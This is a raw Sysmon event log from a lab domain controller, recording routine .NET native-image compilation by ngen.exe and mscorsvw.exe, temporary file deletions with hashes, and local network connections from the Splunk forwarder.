21:07:23.092{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28B-60D3-0206-00000000CF01}5848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.092{4DB9351A-A28B-60D3-0106-00000000CF01}2212NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6C4AG5XL0Q\System.Windows.Input.Manipulations.ni.dll.auxMD5=95E4C80D4A885A768D0AB7CC9B149C97,SHA256=4A2C18AF675765CD318917B09E7683054A9135449D43A8468199B3CB6470487E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.092{4DB9351A-A28B-60D3-0106-00000000CF01}2212NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6C4AG5XL0Q\System.Windows.Input.Manipulations.ni.dllMD5=AB79455ABF9585659E0A7AC4CE500D49,SHA256=F2A7D464C5C081A7C4B601380E165FDA879CB78F614F645D22519B93227DE5C6,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28B-60D3-0106-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.061{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28B-60D3-0106-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.061{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28B-60D3-0106-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.061{4DB9351A-A28B-60D3-0006-00000000CF01}7112NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MD83RQ88MI\System.Windows.Forms.DataVisualization.Design.ni.dll.auxMD5=93C12909F584D53119CA32A6202DC490,SHA256=43609F3AE6C13B06B99C7B1A313BC612743960254B56314B344A32E8B225816A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.061{4DB9351A-A28B-60D3-0006-00000000CF01}7112NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MD83RQ88MI\System.Windows.Forms.DataVisualization.Design.ni.dllMD5=B56B4EF7630997E716A389EEE6585CDA,SHA256=696883C484C20E8CDCC0FDB834D76F7171D9AA27E4E75AA456AA117603AFE08A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28B-60D3-0006-00000000CF01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.030{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28B-60D3-0006-00000000CF01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.030{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28B-60D3-0006-00000000CF01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.014{4DB9351A-A28A-60D3-FF05-00000000CF01}6520NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RB5YXBGRKI\System.Windows.Forms.DataVisualization.ni.dll.auxMD5=B98BD37E01E50B4A1AFD69C7419D677D,SHA256=74E72DCCB9FD507506DDE14928D43B6E2DC68DC36A5F6F7966BEB030C5507A95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023913Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.014{4DB9351A-A28A-60D3-FF05-00000000CF01}6520NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RB5YXBGRKI\System.Windows.Forms.DataVisualization.ni.dllMD5=08343E8B56EB895190DAF0379390078E,SHA256=954C29C400388D8441E2A5C73269E1D005F2DE41AB7C2703AE6B2A9D4C73059C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000024015Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.873{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9C2D620DB90E0643AEE0782D104B7A15,SHA256=D06E6DC240DCC1EC0585F1FB4F8ADE469EDE3B4D4612AB45C5834CAF931E6B60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024014Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:24.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28C-60D3-1206-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024013Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.530{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A28C-60D3-1206-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024012Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:24.530{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28C-60D3-1206-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000024011Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.530{4DB9351A-A28C-60D3-1106-00000000CF01}3604NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\S8P86B6WJ6\XamlBuildTask.ni.dll.auxMD5=2D317FFCF9EBA75D0002ED17BCDDAFBE,SHA256=B4D919EF33C05E08486CD88A8C3988D62E0AE87B138E1FBC4A3AF67EE5FF3B29,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000024010Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.530{4DB9351A-A28C-60D3-1106-00000000CF01}3604NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\S8P86B6WJ6\XamlBuildTask.ni.dllMD5=698D68C9CCB6243ADF41092F74520901,SHA256=5AAB81004CA3364F268EC7820B36DEC33506893B8E805CECD1A3B31764A3085C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000024009Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.514{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28C-60D3-1106-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024008Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.498{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28C-60D3-1106-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024007Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:24.498{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28C-60D3-1106-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000024006Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.483{4DB9351A-A28C-60D3-1006-00000000CF01}7052NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FVE81HWJMC\WsatConfig.ni.exe.auxMD5=1F3029C4D1D06D07E39C9196F214F56F,SHA256=9E607BB2EF8693B86E52F6100E93C6ABD5C44AB4FCC0AA552A3D5240B6F9D3EC,IMPHASH=00000000000000000000000000000000falsetrue 
21:07:25.624{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28D-60D3-1406-00000000CF01}5460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000024026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.624{4DB9351A-A28D-60D3-1306-00000000CF01}3952NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\845UL5YO7B\System.Core.ni.dll.auxMD5=5DAE1AC0A511DB8226CE54ED67EE62D0,SHA256=809C6CDBF1F64A3777B35BCDDBFFDEA9059E4D5864993FE5655AF094247D8735,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000024025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.624{4DB9351A-A28D-60D3-1306-00000000CF01}3952NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\845UL5YO7B\System.Core.ni.dllMD5=96C3A1F95501960ACE4AFABBF30147F9,SHA256=17DD85722623BDB825F2A4C0CAB26F2C6DC123FB1E5CE889C6E3263B756E9BF9,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000024024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.132{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61470-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000024023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.132{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61470-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000024022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.287{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61469-false10.0.1.12-8000- 23542300x800000000000000024021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.248{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0938F67AC9E9F0704F4DBF2E65B597C,SHA256=3E04AEBDAF501BBF450507F6AA1323C2B534513703DFDB547B33565B70360AB1,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000024020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28D-60D3-1306-00000000CF01}3952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 